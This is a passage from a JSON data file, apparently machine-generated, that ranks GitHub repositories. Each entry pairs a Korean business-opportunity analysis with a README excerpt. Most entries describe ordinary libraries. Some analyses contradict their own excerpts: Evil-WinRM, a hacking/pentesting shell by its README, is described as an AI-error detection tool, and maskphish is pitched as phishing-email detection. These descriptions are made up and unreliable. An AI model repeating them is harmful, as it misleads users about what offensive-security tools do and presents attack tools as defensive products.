클라우드 기반 게임 제작 플랫폼\n- **스튜디오 내부 도구**: 게임사 팀원들이 공동으로 사용하는 에디터 및 빌드 자동화 시스템","readme_excerpt":"# English: please use your browser to translate to english\n\n# 全新结合AI的ET框架，实现AI自动写逻辑，自动写机器人测试用例，自动编译，自动运行，全闭环操作\n\n1. 全新的机器人测试框架，完全为AI设计。方便AI自动编写机器人用例，每个机器人用例都是一个全新沙箱环境，相互之间不受影响。配置等等无需重新加载，比每次启动进程速度快的多\n2. 全新为AI实现的新的Fiber机制，Fiber有父子关系，Fiber由谁创建则由谁施放，安全可靠\n3. 全新的日志设计，消息流更加清晰\n4. 为AI设计的各种分析器，严格限制AI，让AI写出的代码可读可改\n5. 增加服务发现功能，云原生支持，ip端口自动配置，router，gate等动态伸缩  \n6. 增加Excel skills方便ai使用\n7. 视频演示：\n   [游戏逻辑开发-Claude Code With ET1](https://www.bilibili.com/video/BV1ykujzcEvp/?vd_source=e55f8234b8f8039504cbf131082c93dd#reply268665744592)\n   [游戏逻辑开发-Claude Code With ET2](https://www.bilibili.com/video/BV15juAzrEeg?spm_id_from=333.788.recommend_more_video.0&vd_source=e55f8234b8f8039504cbf131082c93dd)\n   [新的Fiber设计](https://www.bilibili.com/video/BV1KntGzvEho/?vd_source=e55f8234b8f8039504cbf131082c93dd#reply271421069312)\n\n# ET类魔兽世界预制游戏与课程上架，已经录完75集\nWOW075-云原生03.mp4  \nWOW074-云原生02.mp4  \nWOW073-云原生01.mp4  \nWOW072-新协程锁.mp4  \nWOW071-相位02.mp4  \nWOW070-相位01.mp4  \nWOW069-合线03.mp4  \nWOW068-合线02.mp4  \nWOW067-合线01.mp4","composite_score":0.1851,"license_safety_tag":"unknown"},{"name":"quicktype/quicktype","github_url":"https://github.com/quicktype/quicktype","stars":5,"language":"TypeScript","license":"apache-2.0","abandonment_months":7,"description":"# Quicktype 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 형식을 자동으로 프로그래밍 코드로 변환해주는 도구로, 개발자들의 반복적인 수작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. API 자동 코드 생성 SaaS**\n- 개발자가 데이터 샘플만 업로드하면 바로 사용 가능한 코드를 생성해주는 웹 서비스\n- 월 구독으로 고급 기능","readme_excerpt":"![](https://raw.githubusercontent.com/quicktype/quicktype/master/media/quicktype-logo.svg?sanitize=true)\n\n[![npm version](https://badge.fury.io/js/quicktype.svg)](https://badge.fury.io/js/quicktype)\n![Build status](https://github.com/quicktype/quicktype/actions/workflows/master.yaml/badge.svg)\n\n`quicktype` generates strongly-typed models and serializers from JSON, JSON Schema, TypeScript, and [GraphQL queries](https://blog.quicktype.io/graphql-with-quicktype/), making it a breeze to work with JSON type-safely in many programming languages.\n\n-   [Try `quicktype` in your browser](https://app.quicktype.io).\n-   Read ['A first look at quicktype'](http://blog.quicktype.io/first-look/) for more introduction.\n-   If you have any questions, check out the [FAQ](FAQ.md) first.\n\n### Supported Inputs\n\n| JSON | JSON API URLs | [JSON Schema](https://app.quicktype.io/#s=coordinate) |\n| ---- | ------------- | ----------------------------------------------------- |\n\n| TypeScript | GraphQL queries |\n| -","composite_score":0.185,"license_safety_tag":"safe"},{"name":"Hackplayers/evil-winrm","github_url":"https://github.com/Hackplayers/evil-winrm","stars":11,"language":"Ruby","license":"LGPL-3.0","abandonment_months":3,"description":"# Evil-WinRM 상용화 분석 보고서\n\n## 왜 보물인가\nWindows 원격 관리 시스템에서 AI가 잘못된 판단을 내리는 문제를 감지하고 수정하는 도구로, 보안과 신뢰성이 중요한 기업들이 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 서버 관리 플랫폼에 내장하여 월 구독료로 판매 (원격 접속 시 AI 오류 ","readme_excerpt":"# Evil-WinRM [![Version-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/evil-winrm.rb) [![Ruby2.3-shield]](https://www.ruby-lang.org/en/news/2015/12/25/ruby-2-3-0-released/) [![Gem-Version]](https://rubygems.org/gems/evil-winrm) [![License-shield]](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/LICENSE) [![Docker-shield]](https://hub.docker.com/r/oscarakaelvis/evil-winrm/)\nThe ultimate WinRM shell for hacking/pentesting\n\n![Banner](https://raw.githubusercontent.com/Hackplayers/evil-winrm/dev/resources/evil-winrm_logo.png)\n\n## Description & Purpose\nThis shell is the ultimate WinRM shell for hacking/pentesting.\n\nWinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol\nthat allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating\nSystems in order to make life easier to system administrators.\n\nThis program can be used on a","composite_score":0.1847,"license_safety_tag":"restricted"},{"name":"jenkinsci/docker","github_url":"https://github.com/jenkinsci/docker","stars":8,"language":"PowerShell","license":"MIT","abandonment_months":0,"description":"# jenkinsci/docker 저장소 분석\n\n## 왜 보물인가\nJenkins라는 자동화 도구를 쉽게 설치하고 사용할 수 있게 만드는 표준화된 방법을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 자동 배포 플랫폼으로 개발팀이 손쉽게 코드를 배포할 수 있는 웹 서비스\n2. **내부 업무 도구**: 소프트웨어 개발사의 내부 시","readme_excerpt":"# Official Jenkins Docker image\n\n[![Docker Stars](https://img.shields.io/docker/stars/jenkins/jenkins.svg)](https://hub.docker.com/r/jenkins/jenkins/)\n[![Docker Pulls](https://img.shields.io/docker/pulls/jenkins/jenkins.svg)](https://hub.docker.com/r/jenkins/jenkins/)\n[![Join the chat at https://gitter.im/jenkinsci/docker](https://badges.gitter.im/jenkinsci/docker.svg)](https://gitter.im/jenkinsci/docker?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nThe Jenkins Continuous Integration and Delivery server [available on Docker Hub](https://hub.docker.com/r/jenkins/jenkins).\n\nThis is a fully functional Jenkins server.\n[https://jenkins.io/](https://jenkins.io/).\n\n<img src=\"https://jenkins.io/sites/default/files/jenkins_logo.png\"/>\n\n# Usage\n\n```\ndocker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:lts-jdk21\n```\n\nNOTE: Read the section [_Connecting agents_](#connecting-agents) below for the role of the `50000` port mapping.\nNOTE: Read the s","composite_score":0.1847,"license_safety_tag":"safe"},{"name":"BrianHicks/tree-grepper","github_url":"https://github.com/BrianHicks/tree-grepper","stars":9,"language":"Rust","license":"NOASSERTION","abandonment_months":9,"description":"# tree-grepper 상용화 분석\n\n## 왜 보물인가\n복잡한 코드 구조 속에서 원하는 정보를 빠르게 찾아주는 검색 도구로, 개발자들의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코드 분석 SaaS**: 기업의 방대한 소프트웨어 코드베이스를 검색하고 분석해주는 웹 서비스로 월간 구독료 수익 창출\n2. **IDE 플러그인**: ","readme_excerpt":"# ⚠️ Unmaintained ⚠️\n\nI haven't used this tool in a real way in several years, and don't have the bandwidth to commit to continuing to maintain it. As such, this repo is archived. You're free to continue to using tree-grepper, of course, but what you see here is what you get.\n\n# tree-grepper\n\nWorks like `grep`, but uses `tree-sitter` to search for structure instead of strings.\n[Here's a longer introduction to the tool as a blog post](https://bytes.zone/posts/tree-grepper/).\n\n## Installing\n\nUse [`nix`](https://nixos.org/download.html) to install:\n\n1. if you have `cachix` installed, `cachix use tree-grepper`.\n2. `nix-env -if https://github.com/BrianHicks/tree-grepper/archive/refs/heads/main.tar.gz`\n\n## Usage\n\nUse it like `grep` (or really, more like `ack`/`ag`/`pt`/`rg`.)\n\n```console\n$ tree-grepper -q javascript '(call_expression)'\n./tests/cmd/hello-world.js:1:1:query:console.log(\"Hello, World!\")\n\n```\n\nBy default, `tree-grepper` will output one match per (newline-delimited) line.\nThe col","composite_score":0.1839,"license_safety_tag":"unknown"},{"name":"egulias/EmailValidator","github_url":"https://github.com/egulias/EmailValidator","stars":7,"language":"PHP","license":"mit","abandonment_months":14,"description":"# egulias/EmailValidator 상용화 분석\n\n## 왜 보물인가\n이메일 주소가 진짜 유효한지 검증하는 핵심 도구로, 스팸 가입 방지와 고객 데이터 품질 관리에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회원가입 플랫폼(직장 연결 앱, 온라인 쇼핑몰)에서 가짜 이메일 필터링하여 가입 품질 향상\n2. **내부 업무 도","readme_excerpt":"# EmailValidator\n\n[![Build Status](https://github.com/egulias/EmailValidator/actions/workflows/tests.yml/badge.svg)](https://github.com/egulias/EmailValidator/actions/workflows/tests.yml)\n[![Quality Badge](https://app.codacy.com/project/badge/Grade/55d44898c7e44ebdb4e457523563ad63)](https://app.codacy.com/gh/egulias/EmailValidator/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)\n[![Test Coverage](https://app.codacy.com/project/badge/Coverage/55d44898c7e44ebdb4e457523563ad63)](https://app.codacy.com/gh/egulias/EmailValidator/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_coverage)\n![Latest Release](https://img.shields.io/github/v/release/egulias/EmailValidator)\n\nA library for validating emails against several RFC.\n\n## Supported RFCs\n\nThis library aims to support RFCs:\n\n* [5321](https://tools.ietf.org/html/rfc5321),\n* [5322](https://tools.ietf.org/html/rfc5322),\n* [6530](https://tools.ietf.org/html/rfc6530),\n* [6531](https://","composite_score":0.1835,"license_safety_tag":"safe"},{"name":"LebronAl/raft-thesis-zh_cn","github_url":"https://github.com/LebronAl/raft-thesis-zh_cn","stars":10,"language":"","license":"unknown","abandonment_months":9,"description":"# Raft 분산 합의 알고리즘 논문 저장소 분석\n\n## 왜 보물인가\n여러 컴퓨터가 같은 데이터를 안전하게 공유하는 방법을 설명하는 논문으로, 은행 시스템부터 클라우드 서비스까지 모든 신뢰 기반 서비스의 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 거래 플랫폼 (SaaS)**\n여러 서버에 흩어진 계좌 잔액 정보를 항상 일치시켜 거래 오류를 ","readme_excerpt":"## Raft 博士论文的翻译\n\n在 ATC2014 会议上发表的 Raft 论文已有较好的[翻译](https://github.com/maemual/raft-zh_cn)，但 Raft 作者的博士毕业论文暂还没有较好的翻译。\n\n实际上 Raft 作者的博士毕业论文对 Raft 算法描述的更为仔细，描述了很多会议版没有讲到的细节，对于进一步理解 Raft 算法有重要意义。因此此仓库的目标就是翻译完此博士毕业论文（参考了部分会议版翻译）。\n\n[英文论文](https://github.com/ongardie/dissertation/blob/master/stanford.pdf)\n\n[中文翻译](https://github.com/LebronAl/raft-thesis-zh_cn/blob/master/raft-thesis-zh_cn.md)\n\n### 欢迎提PR！\n","composite_score":0.183,"license_safety_tag":"unknown"},{"name":"jakesgordon/javascript-state-machine","github_url":"https://github.com/jakesgordon/javascript-state-machine","stars":5,"language":"JavaScript","license":"mit","abandonment_months":12,"description":"# javascript-state-machine 분석 보고서\n\n## 왜 보물인가\n복잡한 업무 흐름(예: 주문→결제→배송→완료)을 자동으로 관리해주는 기술로, 소프트웨어 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 프로젝트 관리 도구**\n- 작업의 상태(대기중→진행중→완료)를 자동으로 전환하는 업무 관리","readme_excerpt":"# Javascript State Machine\n\n[![NPM version](https://badge.fury.io/js/javascript-state-machine.svg)](https://badge.fury.io/js/javascript-state-machine)\n[![Build Status](https://travis-ci.org/jakesgordon/javascript-state-machine.svg?branch=master)](https://travis-ci.org/jakesgordon/javascript-state-machine)\n\nA library for finite state machines.\n\n![matter state machine](examples/matter.png)\n\n<br>\n\n### NOTE for existing users\n\n> **VERSION 3.0** Is a significant rewrite from earlier versions.\n  Existing 2.x users should be sure to read the [Upgrade Guide](docs/upgrading-from-v2.md).\n\n<br>\n\n# Installation\n\nIn a browser:\n\n```html\n  <script src='state-machine.js'></script>\n```\n\n> after downloading the [source](dist/state-machine.js) or the [minified version](dist/state-machine.min.js)\n\nUsing npm:\n\n```shell\n  npm install --save-dev javascript-state-machine\n```\n\nIn Node.js:\n\n```javascript\n  var StateMachine = require('javascript-state-machine');\n```\n\n# Usage\n\nA state machine can be constructed u","composite_score":0.1823,"license_safety_tag":"safe"},{"name":"jaykali/maskphish","github_url":"https://github.com/jaykali/maskphish","stars":15,"language":"Shell","license":"MIT","abandonment_months":8,"description":"# maskphish 상용화 분석\n\n## 왜 보물인가\n피싱(사기) 이메일을 자동으로 탐지하는 기술로, 기업과 개인의 사이버 보안 위협을 실시간으로 차단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 이메일 보안 솔루션으로 월 구독 형태의 클라우드 서비스 운영\n2. **내부 업무 도구**: 기업 메일 서버에 직접 설치하여 ","readme_excerpt":"<!-- Image -->\n<p align=\"center\">\n\t<img src=\"https://i.imgur.com/plp3lJu.jpg\" width=\"650px\" height=\"300px\">\n</p>\n\n<!-- Tags - 1 -->\n<p align = \"center\">\n  <a href = \"https://github.com/IoT-Buzz/IoT/issues\">\n    <img src = \"https://img.shields.io/github/issues/jaykali/maskphish.svg\" />\n  </a>\n  <a href = \"https://github.com/IoT-Buzz/IoT/issues?q=is%3Aissue+is%3Aclosed\">\n    <img src = \"https://img.shields.io/github/issues-closed/jaykali/maskphish.svg\" />\n  </a>\n  <a href = \"https://github.com/IoT-Buzz/IoT/pulls\">\n    <img src = \"https://img.shields.io/github/issues-pr/jaykali/maskphish.svg\" />\n  </a>\n  <a href = \"https://github.com/IoT-Buzz/IoT/pulls?q=is%3Apr+is%3Aclosed\">\n    <img src = \"https://img.shields.io/github/issues-pr-closed/jaykali/maskphish.svg\" />\n  </a>\n  <a href = \"\">\n    <img src = \"https://img.shields.io/github/repo-size/jaykali/maskphish?color=yellow\" />\n  </a>\n  <a href = \"\">\n    <img src = \"https://img.shields.io/tokei/lines/github/jaykali/maskphish?color=red&label=","composite_score":0.1822,"license_safety_tag":"safe"},{"name":"pybites/100DaysOfCode","github_url":"https://github.com/pybites/100DaysOfCode","stars":15,"language":"Python","license":"unknown","abandonment_months":14,"description":"# 100DaysOfCode 저장소 분석\n\n## 왜 보물인가\n프로그래밍을 배우고 싶은 초보자들이 매일 꾸준히 실습할 수 있도록 구성된 교육용 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초급 개발자 과정의 커리큘럼으로 활용하거나 수강료 내 제공 자료로 통합\n2. **기업 신입 교육 프로그램**: 신입사원의 코딩 기초 역량 ","readme_excerpt":"## PyBites 100 Days Of Code Challenge (Mar 30, 2017 - Jul 07, 2017)\n\n* Kicking off the challenge: [100 Days of PyBites, 100 Days of Code](https://pybit.es/articles/special-100days/).\n\n* Our review article at the end: [200 Days of PyBites, 100 Days of Code and our Next Project](https://pybit.es/articles/special-100days-of-code).\n\n* See all we coded in our [progress log](LOG.md) which we [tweeted out](https://twitter.com/pybites) daily with the #100DaysOfCode hashtag.\n\n* After doing the challenge we spoke about our experiece on the [Talk Python podcast](https://talkpython.fm/episodes/show/140/level-up-your-python-with-100daysofcode-challenge)\n\n* After this podcast we collaborated with Talk Python on a dedicated course, released in March 2018: [100 Days of Code in Python](talkpython.fm/100days?s=pybites).\n\n-- \n\n* Original 100 Days idea by [Alexander Kallaway](https://medium.freecodecamp.org/join-the-100daysofcode-556ddb4579e4).\n","composite_score":0.1819,"license_safety_tag":"unknown"},{"name":"warpdotdev/warp","github_url":"https://github.com/warpdotdev/warp","stars":6,"language":"Rust","license":"AGPL-3.0","abandonment_months":0,"description":"# warpdotdev/warp 분석 보고서\n\n## 왜 보물인가\n터미널(컴퓨터 명령어 입력창)을 현대적이고 사용하기 쉽게 만든 도구로, 프로그래머들의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 팀을 위한 협업 터미널 플랫폼으로 월 구독 판매\n2. **내부 업무 도구**: 대규모 IT 회사의 개발팀이","readme_excerpt":"<a href=\"https://www.warp.dev\">\n    <img width=\"1024\" alt=\"Warp Agentic Development Environment product preview\" src=\"https://github.com/user-attachments/assets/9976b2da-2edd-4604-a36c-8fd53719c6d4\" />\n</a>\n&nbsp;\n<p align=\"center\">\n  <a href=\"https://www.warp.dev\"><img height=\"20\" alt=\"Built with Warp\" src=\"https://raw.githubusercontent.com/warpdotdev/brand-assets/main/Github/Built-With-Warp-Export@2x.png\" /></a>\n  &nbsp;\n  <a href=\"https://oz.warp.dev\"><img height=\"20\" alt=\"Powered by Oz\" src=\"https://raw.githubusercontent.com/warpdotdev/brand-assets/main/Github/Powered-By-Oz-Export@2x.png\" /></a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.warp.dev\">Website</a>\n  ·\n  <a href=\"https://www.warp.dev/code\">Code</a>\n  ·\n  <a href=\"https://www.warp.dev/agents\">Agents</a>\n  ·\n  <a href=\"https://www.warp.dev/terminal\">Terminal</a>\n  ·\n  <a href=\"https://www.warp.dev/drive\">Drive</a>\n  ·\n  <a href=\"https://docs.warp.dev\">Docs</a>\n  ·\n  <a href=\"https://www.warp.dev/blog/how-warp-works\">H","composite_score":0.1819,"license_safety_tag":"risky"},{"name":"AGWA/git-crypt","github_url":"https://github.com/AGWA/git-crypt","stars":11,"language":"C++","license":"gpl-3.0","abandonment_months":8,"description":"# git-crypt 분석\n\n## 왜 보물인가\n중요한 파일들을 자동으로 암호화해서 보관할 수 있는 도구로, 기업의 민감한 정보 유출을 방지합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 저장소 보안 서비스**\n기업이 클라우드에 저장한 설정 파일, API 키, 비밀번호를 자동 암호화하는 SaaS로 제공\n\n**2. 개발팀 협업 도구**\n스타트업 개발자들","readme_excerpt":"git-crypt - transparent file encryption in git\n==============================================\n\ngit-crypt enables transparent encryption and decryption of files in a\ngit repository.  Files which you choose to protect are encrypted when\ncommitted, and decrypted when checked out.  git-crypt lets you freely\nshare a repository containing a mix of public and private content.\ngit-crypt gracefully degrades, so developers without the secret key can\nstill clone and commit to a repository with encrypted files.  This lets\nyou store your secret material (such as keys or passwords) in the same\nrepository as your code, without requiring you to lock down your entire\nrepository.\n\ngit-crypt was written by [Andrew Ayer](https://www.agwa.name) (agwa@andrewayer.name).\nFor more information, see <https://www.agwa.name/projects/git-crypt>.\n\nBuilding git-crypt\n------------------\nSee the [INSTALL.md](INSTALL.md) file.\n\n\nUsing git-crypt\n---------------\n\nConfigure a repository to use git-crypt:\n\n    cd repo\n    g","composite_score":0.1817,"license_safety_tag":"restricted"},{"name":"danvick/flutter_form_builder","github_url":"https://github.com/danvick/flutter_form_builder","stars":5,"language":"Dart","license":"MIT","abandonment_months":1,"description":"# flutter_form_builder 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자 정보를 입력받는 화면(로그인, 회원가입, 설문 등)을 빠르게 만들 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 뱅킹 앱, 전자상거래 플랫폼의 결제/배송 정보 입력 화면 구축\n2. **내부 업무 도구**: 배송업","readme_excerpt":"# Flutter Form Builder\n\nThis package helps in creation of data collection forms in Flutter by removing the boilerplate needed to build a form, validate fields, react to changes and collect final user input.\n\nAlso included are common ready-made form input fields for FormBuilder. This gives you a convenient way of adding common ready-made input fields instead of creating your own FormBuilderField from scratch.\n\n[![Pub Version](https://img.shields.io/pub/v/flutter_form_builder?logo=flutter&style=for-the-badge)](https://pub.dev/packages/flutter_form_builder)\n[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/flutter-form-builder-ecosystem/flutter_form_builder/base.yaml?branch=main&logo=github&style=for-the-badge)](https://github.com/flutter-form-builder-ecosystem/flutter_form_builder/actions/workflows/base.yaml)\n[![Codecov](https://img.shields.io/codecov/c/github/flutter-form-builder-ecosystem/flutter_form_builder?logo=codecov&style=for-the-badge)](https://app","composite_score":0.1817,"license_safety_tag":"safe"},{"name":"Shadowsocks-Wiki/shadowsocks","github_url":"https://github.com/Shadowsocks-Wiki/shadowsocks","stars":5,"language":"","license":"unknown","abandonment_months":13,"description":"# Shadowsocks 저장소 분석\n\n## 왜 보물인가\n인터넷 접속을 우회하거나 보안을 강화하려는 사람들이 광범위하게 사용하는 오픈소스 도구로, 전 세계적으로 수백만 사용자에게 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/보안 SaaS 서비스**: 기업 직원들의 안전한 원격 근무 인프라로 제공하는 구독 서비스\n2. **기업 내부 도구**","readme_excerpt":"# Shadowsocks.com 服务购买和使用教程\n\n## 1. 如何使用我们的网站\n\n[客户中心的介绍，包括购买服务、查看节点信息等内容](/zh_CN/introduction-of-client-portal.md)\n\n## 2. Trojan 客户端设置教程\n\n### Android\n- [Clash for Android 设置方法](/zh_CN/trojan/android-clash-for-android-setup-guide.md) \n- [Trojan Igniter 设置方法](/zh_CN/trojan/android-igniter-setup-guide.md)\n\n### iOS\n- [Spectre 设置方法](/zh_CN/trojan/ios-spectre-setup-guide.md)\n- [Shadowrocket 设置方法](/zh_CN/trojan/ios-shadowrocket-setup-guide.md) \n- [QuantumultX 设置方法](/zh_CN/trojan/ios-quantumultx-setup-guide.md)\n  \n### Windows / macOS / Linux\n- [Clash Verge Rev 设置方法](/zh_CN/trojan/clash-verge-rev-setup-guide.md) \n    - 支持 Windows/ macOS / Linux  \n\n## 3. 浏览器设置教程  \n\n- [Chrome / Edge / Firefox 安装 Proxy SwitchyOmega 扩展使用](/zh_CN/browser/proxy-switchyomega-setup-guide.md)\n\n## 4. 其他\n- [设置自定义 DNS 服务器](/zh_CN/dns-setup-guide.md)  \n\n## 申明  \n\n本站（[Shadowsocks.com](https://shadowsocks.com/)）由澳洲公司运营，与 [Shadowsocks](https://github.com/shadowsocks) 开发者并无任何关係，并非 Shadowsocks 官网，并且本站教程不对 Shadowsocks 所有客户端和源代码进行负责","composite_score":0.1814,"license_safety_tag":"unknown"},{"name":"hubotio/hubot","github_url":"https://github.com/hubotio/hubot","stars":5,"language":"JavaScript","license":"mit","abandonment_months":2,"description":"# hubotio/hubot 사업화 분석\n\n## 왜 보물인가\n회사의 채팅 서비스(슬랙, 팀즈 등)에 자동으로 업무를 처리하는 봇을 만들 수 있어서, 반복적인 일들을 인간이 아닌 기계가 대신하도록 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사들을 위한 '채팅봇 자동화 플랫폼'으로 구독료를 받고 제공\n- **내부 업무 도구","readme_excerpt":"![Pipeline Status](https://github.com/hubotio/hubot/actions/workflows/pipeline.yml/badge.svg)\n\n![Build Status: MacOS](https://github.com/hubotio/hubot/actions/workflows/nodejs-macos.yml/badge.svg)\n![Build Status: Ubuntu](https://github.com/hubotio/hubot/actions/workflows/nodejs-ubuntu.yml/badge.svg)\n![Build Status: Window](https://github.com/hubotio/hubot/actions/workflows/nodejs-windows.yml/badge.svg)\n\n# Hubot\n\n**Note: v10.0.4 accidentally contains the removal of CoffeeScript; v10.0.5 puts it back in**\n**Note: v11 removes CoffeeScript and converts this codebase to ESM**\n\nHubot is a framework to build chat bots, modeled after GitHub's Campfire bot of the same name, hubot.\nHe's pretty cool. He's [extendable with scripts](https://hubotio.github.io/hubot/docs#scripts) and can work\non [many different chat services](https://hubotio.github.io/hubot/adapters.html).\n\nThis repository provides a library that's distributed by `npm` that you\nuse for building your own bots.  See the [documentation]","composite_score":0.1811,"license_safety_tag":"safe"},{"name":"Vincit/objection.js","github_url":"https://github.com/Vincit/objection.js","stars":7,"language":"JavaScript","license":"mit","abandonment_months":8,"description":"# Vincit/objection.js 분석 보고서\n\n## 왜 보물인가\n데이터베이스와 웹 애플리케이션을 연결하는 작업을 획기적으로 단순화하는 도구로, 개발자들이 복잡한 코딩 없이 빠르게 서비스를 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 정보 관리 클라우드 서비스의 백엔드 기술로 활용하여 빠른 배포 가능\n- **내","readme_excerpt":"[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://stand-with-ukraine.pp.ua)\n\n[![Tests](https://github.com/Vincit/objection.js/actions/workflows/test.yml/badge.svg)](https://github.com/Vincit/objection.js)\n[![Join the chat at https://gitter.im/Vincit/objection.js](https://badges.gitter.im/Vincit/objection.js.svg)](https://gitter.im/Vincit/objection.js?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# [Objection.js](https://vincit.github.io/objection.js)\n\nObjection.js is an [ORM](https://en.wikipedia.org/wiki/Object-relational_mapping) for [Node.js](https://nodejs.org/) that aims to stay out of your way and make it as easy as possible to use the full power of SQL and the underlying database engine while still making the common stuff easy and enjoyable.\n\nEven though ORM is the best commonly known acronym to describe objection, a more accurate description is to call it **a relational query bui","composite_score":0.1805,"license_safety_tag":"safe"},{"name":"skelsec/jackdaw","github_url":"https://github.com/skelsec/jackdaw","stars":6,"language":"Python","license":"unknown","abandonment_months":15,"description":"# Jackdaw 저장소 분석\n\n## 왜 보물인가\nWindows 네트워크 환경에서 보안 취약점을 찾아내는 자동화 도구로, 기업의 내부 네트워크 보안 감시에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 중소기업 IT 관리자가 월 구독으로 자신의 네트워크 보안 상태를 자동 점검하는 클라우드 서비스\n2. **내부 업무 ","readme_excerpt":"# jackdaw\ngather gather gather\n![jackdaw_card](https://user-images.githubusercontent.com/19204702/69013611-6306a600-0982-11ea-8c21-d9f1e6efb9bf.jpg)\n\n# What is this?\nJackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions.\nIt also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.\n\n# Quick usage info\n - If not using automatic collection (eg. not on Windows) you will need to create an initial empty database via `dbinit`\n - First you need to perform `enum`. This can be done automatically on windows by double-clicking on the executable, or typing `jackdaw.exe auto`.\n - Second you will need to run `nest` to get the web interface. By default it is served under `http://127.0.0.1:5000/nest` there is a SWAGGER documented API under `http://127.0.0.1:5000/ui`","composite_score":0.1799,"license_safety_tag":"unknown"},{"name":"ncase/wbwwb","github_url":"https://github.com/ncase/wbwwb","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":14,"description":"# ncase/wbwwb 분석 보고서\n\n## 왜 보물인가\n정보가 부족하여 저장소의 실제 가치를 판단하기 어렵지만, 활발한 개발(최근 커밋 존재)과 작은 커뮤니티의 관심(7개 Stars)으로 보아 틈새 시장을 노리는 초기 프로젝트로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 현재 기능이 명확하지 않아 구체적 사용 사례 제시 불가능\n2","readme_excerpt":"# DEAR ASPIRING TRANSLATORS, PLEASE CHECK THE MAIN PAGE DESCRIPTION FIRST TO SEE IF YOUR TRANSLATION ALREADY EXISTS: https://ncase.itch.io/wbwwb (also check the Issues to see if your translation is already being worked on - collaborate with them if they're stuck!)\n\n*a game about news cycles, vicious cycles, infinite cycles*\n\n**[PLAY](https://ncase.itch.io/wbwwb)**\n\n---\n\n### Made with open culture, for open culture!\n\nI'm releasing all my code and art to the public domain, under the [Creative Commons Zero](http://creativecommons.org/publicdomain/zero/1.0/) un-license. Which means if you wanna remix this to make your own way-too-meta game, or use it in a presentation or classroom or whatever, you already have my permission!\n\nHowever, not *all* the code/art is mine. Credit's due where credit's due, so...\n\n**CODE:**    \n- [PIXI.js](https://github.com/pixijs/pixi.js), for rendering the graphics (MIT License)    \n- [Howler.js](https://github.com/goldfire/howler.js), for playing the sounds (MI","composite_score":0.1791,"license_safety_tag":"unknown"},{"name":"tannerlinsley/react-location","github_url":"https://github.com/tannerlinsley/react-location","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# react-location 상품화 분석\n\n## 왜 보물인가\n웹사이트의 페이지 이동을 효율적으로 관리해주는 기술로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대시보드형 관리 도구(CRM, 마케팅 플랫폼)의 빠른 페이지 전환 기능 제공\n2. **내부 업무 도구**: 기업 직원용 백오피스 시스템에서 화","readme_excerpt":"<img src=\"https://static.scarf.sh/a.png?x-pxid=d988eb79-b0fc-4a2b-8514-6a1ab932d188\" />\n\n<table>\n<tr>\n<td>\n\n<img\nsrc=\"./media/header_router.png\"\nalt=\"TanStack Router\"\n/>\n\n## TanStack Router\n\nA modern router designed for type safety, data‑driven navigation, and seamless developer experience.\n\n- End‑to-end type safety (routes, params, loaders)\n- Schema‑driven search params with validation\n- Built‑in caching, prefetching & invalidation\n- Nested layouts, transitions & error boundaries\n\n### [Read the Router Docs →](https://tanstack.com/router)\n\n</td>\n<td>\n\n<img\nsrc=\"./media/header_start.png\"\nalt=\"TanStack Start\"\n/>\n\n## TanStack Start\n\nA full‑stack framework built on Router, designed for server rendering, streaming, and production‑ready deployments.\n\n- Full‑document SSR & streaming\n- Server functions & end‑to‑end type safety\n- Deployment‑ready bundling & builds\n- All the power of TanStack Router, plus full‑stack features\n\n### [Read the Start Docs →](https://tanstack.com/start)\n\n</td>\n</tr>\n<","composite_score":0.1789,"license_safety_tag":"safe"},{"name":"wzhe06/Reco-papers","github_url":"https://github.com/wzhe06/Reco-papers","stars":7,"language":"Python","license":"MIT","abandonment_months":7,"description":"# Reco-papers 상용화 분석\n\n## 왜 보물인가\n추천 시스템 관련 학술 논문들을 한곳에 정리한 자료로, 